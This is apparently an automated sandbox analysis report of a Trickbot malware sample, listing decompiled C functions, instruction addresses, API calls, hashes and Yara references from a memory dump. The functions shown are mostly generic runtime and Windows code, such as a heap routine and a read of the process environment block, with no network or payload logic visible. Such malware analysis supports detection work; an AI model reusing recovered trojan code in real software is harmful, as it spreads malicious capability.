0x004199cb
0x004199cc
0x004199cf
0x004199d2
0x004199d2
0x004199d3
0x004199d7
0x004199d7
0x004199d8
0x004199da
0x00000000
0x00000000
0x004199e1
0x004199e3
0x00000000
0x00000000
0x004199ea
0x00000000
0x00000000
0x00419ada
0x00000000
0x00000000
0x004199f4
0x004199f7
0x004199fa
0x004199fb
0x00000000
0x00000000
0x00419a09
0x00419a0a
0x00000000
0x00000000
0x00419a1a
0x00419a21
0x00419a22
0x00419a27
0x00000000
0x00000000
0x00419a30
0x00419a33
0x00000000
0x00000000
0x00419a3e
0x00419a41
0x00000000
0x00000000
0x00419a4d
0x00419a4e
0x00419a51
0x00419a52
0x00419a55
0x00000000
0x00000000
0x00419a5c
0x00000000
0x00000000
0x00419a6e
0x00419a6f
0x00000000
0x00000000
0x00419a74
0x00419a77
0x00419a7a
0x00419a7d
0x00419a7e
0x00419a7e
0x00419a82
0x00000000
0x00000000
0x00419a89
0x00419a8d
0x004199fe
0x004199fe
0x00000000
0x00000000
0x00419a9d
0x00419adb
0x00419adb
0x00000000
0x00000000
0x00419aa3
0x00419aa6
0x00419aa8
0x00000000
0x00000000
0x00419aaf
0x00419ab2
0x00419ab5
0x00419abc
0x00419abf
0x00419ac2
0x00419ac5
0x00419ad6
0x00419ad7
0x00419ade
0x00419ade
0x00419ae0
0x00000000
0x00419ae0
0x00419acd
0x00419ace
0x00419ad1
0x00000000
0x00000000
0x00419afa
0x00000000
0x00000000
0x00419b26
0x00419b27
0x00419b29
0x00419b2c
0x00000000
0x00000000
0x00419ae7
0x00419aea
0x00419aed
0x00419af0
0x00000000
0x00000000
0x00419af4
0x00419af6
0x00000000
0x00000000
0x00000000
0x00000000
0x00419a61
0x00419a62
0x00419a62
0x00419a38
0x00419a38
0x00419afb
0x00419afb
0x00419afd
0x00000000
0x00000000
0x004198e0
0x004198e4
0x00419af1
0x00419af1
0x00419b6b
0x00419b6d
0x00419b6f
0x00419b6f
0x00000000
0x00000000
0x00419b37
0x00419b3d
0x00419b3e
0x00419b3f
0x00419b42
0x00419b44
0x00419b47
0x00419b48
0x00419b4c
0x00419b4d
0x00419b4f
0x00419731
0x00419733
0x00000000
0x00000000
0x00000000
0x00000000
0x00419b01
0x00419b04
0x00419b05
0x00419b08
0x00419b08
0x00419b09
0x00419a2a
0x00419a2a
0x00000000
0x00000000
0x00419b12
0x00419b15
0x00419b18
0x00419b1b
0x00419b1c
0x00419b1c
0x00419b1d
0x00419b20
0x00419b20
0x00419b22
0x00000000
0x00000000
0x004198ac
0x004198a6
0x00419b64
0x00419b64
0x00000000
0x00419b64
0x00419b2e
0x00419b2e
0x00419b2e
0x00419b72
0x00419b72
0x00419b77
0x00419b7c
0x00419b7c
0x00419b7e
0x00419b80
0x00419863
0x00419869
0x00419871
0x00419871
0x00419759
0x00419716
0x0041971c
0x00000000
0x00000000
0x00419727
0x00419728
0x00419729
0x0041972e
0x00000000
0x0041972e
0x004196f9
0x004196fe
0x00419706
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004196DD
GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00419890

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prologVersion
String ID:
API String ID: 1836448879-0
Opcode ID: 97259873a2008b5b65ad31e05acc28ca61a34101e003d42508f6c5f9eb32b744
Instruction ID: f44f9266093c5cd8a2ab8314d556b248f281fc2a73fb1656333fc09446bddc6e
Opcode Fuzzy Hash: 97259873a2008b5b65ad31e05acc28ca61a34101e003d42508f6c5f9eb32b744
Instruction Fuzzy Hash: 68E18F70614205EBDF14DF65CCA0AFE77A9FF04314F10851AF8169A291DB38EE82DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041E050, Relevance: 3.1, APIs: 2, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041E050(CHAR* _a4, intOrPtr* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* __ebp;
				signed char _t21;
				void* _t23;
				intOrPtr _t36;
				void* _t37;
				signed int _t43;
				intOrPtr* _t45;

				_t45 = _a8;
				_push(_a4);
				_t43 = _t45 + 0x12;
				_push(_t43);
				_t21 = E0041D790();
				if(_t21 != 0) {
					_t23 = FindFirstFileA(_a4,  &_v324);
					_t44 = _t43 | 0xffffffff;
					if(_t23 != (_t43 | 0xffffffff)) {
						FindClose(_t23);
						 *(_t45 + 0x10) = _v324.dwFileAttributes & 0x0000007f;
						 *((intOrPtr*)(_t45 + 0xc)) = _v324.nFileSizeLow;
						 *_t45 =  *((intOrPtr*)(E00416006( &_a4,  &(_v324.ftCreationTime), _t44)));
						 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(E00416006( &_a4,  &(_v324.ftLastAccessTime), _t44)));
						_t36 =  *((intOrPtr*)(E00416006( &_a4,  &(_v324.ftLastWriteTime), _t44)));
						 *((intOrPtr*)(_t45 + 4)) = _t36;
						if( *_t45 == 0) {
							 *_t45 = _t36;
						}
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 4));
						}
						_t37 = 1;
						return _t37;
					}
					L3:
					return 0;
				}
				 *_t43 =  *_t43 & _t21;
				goto L3;
			}

0x0041e05a
0x0041e05e
0x0041e061
0x0041e064
0x0041e065
0x0041e06c
0x0041e07c
0x0041e082
0x0041e087
0x0041e08e
0x0041e0a0
0x0041e0a9
0x0041e0bb
0x0041e0cf
0x0041e0e1
0x0041e0e3
0x0041e0e9
0x0041e0eb
0x0041e0eb
0x0041e0f1
0x0041e0f6
0x0041e0f6
0x0041e0fb
0x00000000
0x0041e0fb
0x0041e089
0x00000000
0x0041e089
0x0041e06e
0x00000000

APIs

Part of subcall function 0041D790: __EH_prolog.LIBCMT ref: 0041D795
Part of subcall function 0041D790: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0041D7B3
Part of subcall function 0041D790: lstrcpynA.KERNEL32(?,?,00000104), ref: 0041D7C2

FindFirstFileA.KERNEL32(?,?,?,?), ref: 0041E07C
FindClose.KERNEL32(00000000), ref: 0041E08E

Part of subcall function 00416006: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00416016
Part of subcall function 00416006: FileTimeToSystemTime.KERNEL32(?,?), ref: 00416028

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
String ID:
API String ID: 1806329094-0
Opcode ID: e112b580549393529589ac8462ba1568369bc468c0aef79684a4e5432c9baad8
Instruction ID: 11aa785b8609821e5c3913dd45f7471bb1c9177f990fd37d235ac8e5a6537ffa
Opcode Fuzzy Hash: e112b580549393529589ac8462ba1568369bc468c0aef79684a4e5432c9baad8
Instruction Fuzzy Hash: 19216276400214AFCB21DF66C840ADBBBF8AF59310F10896AE996C7250E774EA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042BF21, Relevance: 3.0, APIs: 2, Instructions: 37
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042BF21(void* __ecx, void* __eflags, long _a4) {
				void* _t6;
				intOrPtr _t9;
				void* _t13;
				long _t14;

				_t14 = _a4;
				_t13 = __ecx;
				if(E00419115(__ecx, _t14) != 0) {
					L7:
					_t6 = 1;
					return _t6;
				}
				if( *((intOrPtr*)(_t14 + 4)) != 0x100 || GetAsyncKeyState(0x11) >= 0) {
					L8:
					return E0041AFF4(_t14);
				} else {
					_t9 =  *((intOrPtr*)(_t14 + 8));
					if(_t9 == 9 || _t9 == 0x21 || _t9 == 0x22) {
						if(SendMessageA( *(_t13 + 0x1c), 0x475, 0, _t14) == 0) {
							goto L8;
						}
						goto L7;
					} else {
						goto L8;
					}
				}
			}

0x0042bf22
0x0042bf27
0x0042bf31
0x0042bf70
0x0042bf72
0x00000000
0x0042bf72
0x0042bf3a
0x0042bf75
0x00000000
0x0042bf49
0x0042bf49
0x0042bf4f
0x0042bf6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042bf4f

APIs

GetAsyncKeyState.USER32(00000011), ref: 0042BF3E
SendMessageA.USER32(?,00000475,00000000,?), ref: 0042BF66

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AsyncMessageSendState
String ID:
API String ID: 929296675-0
Opcode ID: 44dd49ad71f75a96d58f715f8125e076d3032ba81f10070f9eac059bbeff7439
Instruction ID: 96bedf7c5fa55a779db449b2874e7636fec8fc24457eb60f5af0196471df2360
Opcode Fuzzy Hash: 44dd49ad71f75a96d58f715f8125e076d3032ba81f10070f9eac059bbeff7439
Instruction Fuzzy Hash: FEF09E31304221B6DE300A35BD48BEB2758DF00340F5544ABF904D1291DBE8ECC2EADD

Uniqueness

Uniqueness Score: -1.00%

Function 0042ED76, Relevance: 3.0, APIs: 2, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042ED76(void* __ecx, intOrPtr _a4) {
				void* _t4;
				void* _t13;
				intOrPtr _t14;

				_t14 = _a4;
				_t13 = __ecx;
				if(_t14 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x1c)) != 0) {
						if(IsIconic( *(_t13 + 0x1c)) != 0) {
							_push(9);
							goto L5;
						}
					} else {
						_push(1);
						L5:
						_pop(_t14);
					}
				}
				_t4 = E0042EDC6(_t13, _t14);
				if(_t14 != 0xffffffff) {
					E0041B7D3(_t13, _t14);
					return E0042EDC6(_t13, _t14);
				}
				return _t4;
			}

0x0042ed77
0x0042ed7f
0x0042ed81
0x0042ed8e
0x0042ed9f
0x0042eda1
0x00000000
0x0042eda1
0x0042ed90
0x0042ed90
0x0042eda3
0x0042eda3
0x0042eda3
0x0042ed8e
0x0042eda7
0x0042edaf
0x0042edb4
0x00000000
0x0042edbc
0x0042edc3

APIs

IsWindowVisible.USER32(?), ref: 0042ED86
IsIconic.USER32(?), ref: 0042ED97

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 15feef5438a24e68bf2c3d7647092dee162e517e2fd7af79898d3694befd7fce
Instruction ID: 30ef9bd84cb1d98728b7d72c2cb64cabec22e2df57df4cd4028a959cb483a23f
Opcode Fuzzy Hash: 15feef5438a24e68bf2c3d7647092dee162e517e2fd7af79898d3694befd7fce
Instruction Fuzzy Hash: FDF0EC3132113226CE212A2FFC406BF255A5FC1774B54522BF521923D0CB585C83529A

Uniqueness

Uniqueness Score: -1.00%

Function 00425C28, Relevance: 3.0, APIs: 2, Instructions: 15
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425C28(intOrPtr* __ecx) {
				int _t4;
				intOrPtr* _t9;

				_t9 = __ecx;
				_t4 = IsIconic( *(__ecx + 0x1c));
				if(_t4 == 0) {
					_t4 = IsWindowVisible( *(_t9 + 0x1c));
					if(_t4 != 0) {
						return  *((intOrPtr*)( *_t9 + 0xbc))();
					}
				}
				return _t4;
			}

0x00425c29
0x00425c2e
0x00425c36
0x00425c3b
0x00425c43
0x00000000
0x00425c49
0x00425c43
0x00425c50

APIs

IsIconic.USER32(?), ref: 00425C2E
IsWindowVisible.USER32(?), ref: 00425C3B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 197ae62a49a6a2c0b509c2ce516134089cb71c82eba9449eafff5446f3f68cee
Instruction ID: bdcd10452f94024076020d3b11954761afefc7d6f9495eb3bab1ee725d4aa70c
Opcode Fuzzy Hash: 197ae62a49a6a2c0b509c2ce516134089cb71c82eba9449eafff5446f3f68cee
Instruction Fuzzy Hash: 62D05E303007208FDB251F26FC08A5676A5AF14601300807DE043C2364EB749C028A44

Uniqueness

Uniqueness Score: -1.00%

Function 00409A18, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00409A1D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a3befa1aca8b9be3bf6230e9e0998f1579662b286a226ea3c243bff66a41c820
Instruction ID: 29fb6ca460f1e598a3c7da5758b6d036266992367b56be17457cc60ff7533e14
Opcode Fuzzy Hash: a3befa1aca8b9be3bf6230e9e0998f1579662b286a226ea3c243bff66a41c820
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004089E4, Relevance: .3, Instructions: 259
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004089E4(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x004089ea
0x004089f3
0x004089fe
0x00408a01
0x00408a04
0x00408a16
0x00408a1c
0x00408a1f
0x00408a22
0x00408a26
0x00408a2a
0x00408a2d
0x00408b92
0x00408b98
0x00408b9b
0x00408b9e
0x00408ba1
0x00408ba4
0x00408bab
0x00408bb1
0x00408bb2
0x00408bb5
0x00408bb8
0x00408bbc
0x00408bbc
0x00408bbd
0x00408bc1
0x00408bcd
0x00408bce
0x00408bd1
0x00408bd5
0x00408bd5
0x00408bd9
0x00408bdc
0x00408bde
0x00408be1
0x00408c01
0x00408c0b
0x00408c0b
0x00408c0f
0x00408c11
0x00408c18
0x00408c18
0x00408c1a
0x00408c1c
0x00408c1f
0x00408c1f
0x00408c1f
0x00408c1f
0x00408be3
0x00408bec
0x00408bf0
0x00408bf2
0x00408bf6
0x00408bf6
0x00408bf8
0x00408bfd
0x00408bfd
0x00408bf8
0x00408c22
0x00408c22
0x00408c2b
0x00408c34
0x00408c3a
0x00408c3d
0x00408c43
0x00408c44
0x00408c47
0x00408c4b
0x00408c4b
0x00408c47
0x00408c4c
0x00408c53
0x00408c56
0x00408c59
0x00408c5c
0x00408c62
0x00408c68
0x00408c6b
0x00408c6d
0x00408c71
0x00408c74
0x00408c77
0x00408c77
0x00408c79
0x00408c7d
0x00408ca0
0x00408ca4
0x00408cb0
0x00408cb3
0x00408cb3
0x00408cb3
0x00408cb3
0x00408cb6
0x00408cbd
0x00408cc0
0x00408c7f
0x00408c7f
0x00408c83
0x00408c8e
0x00408c91
0x00408c91
0x00408c91
0x00408c93
0x00408c97
0x00408c9c
0x00408c9c
0x00408cc7
0x00408cc7
0x00408cc7
0x00408cc9
0x00408ccc
0x00408cce
0x00408cce
0x00408cd2
0x00408cd4
0x00000000
0x00408cd4
0x00408a36
0x00000000
0x00408a46
0x00408a4c
0x00408a50
0x00408a53
0x00408a57
0x00408a58
0x00408a58
0x00408a61
0x00408a66
0x00408a94
0x00408a98
0x00408a9a
0x00408aa1
0x00408aa1
0x00408aa3
0x00408aa5
0x00408aa8
0x00408aa8
0x00408aa8
0x00408aa8
0x00408a68
0x00408a72
0x00408a76
0x00408a78
0x00408a7c
0x00408a7e
0x00408a83
0x00408a83
0x00408a7e
0x00408a66
0x00408ab1
0x00408aba
0x00408ac2
0x00408ac9
0x00408b79
0x00408acf
0x00408ad8
0x00408ad9
0x00408ae0
0x00408ae4
0x00408ae4
0x00408ae8
0x00408aeb
0x00408af1
0x00408af4
0x00408af7
0x00408afa
0x00408b00
0x00408b09
0x00408b0b
0x00408b12
0x00408b15
0x00408b17
0x00408b1b
0x00408b3e
0x00408b42
0x00408b44
0x00408b4e
0x00408b51
0x00408b51
0x00408b51
0x00408b51
0x00408b54
0x00408b5b
0x00408b5b
0x00408b5e
0x00408b1d
0x00408b21
0x00408b2f
0x00408b2f
0x00408b31
0x00408b35
0x00408b3a
0x00408b3a
0x00408b65
0x00408b65
0x00408b67
0x00408b6a
0x00408b6d
0x00408b71
0x00408b73
0x00408b73
0x00408b7c
0x00408b7f
0x00408b82
0x00000000
0x00408b82

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: 4786073986c82a0dad9da1472215731919049a7f6ec6ffdd01f582f7f1c4f418
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: E4B18F7190520ADFDB15CF04C6D0AA9BBB1BF58318F14C1AED85A5B782CB35FA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402D50, Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D50(void* __ecx) {
				intOrPtr _v8;

				_v8 =  *[fs:0x30];
				return _v8;
			}

0x00402d5a
0x00402d63

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
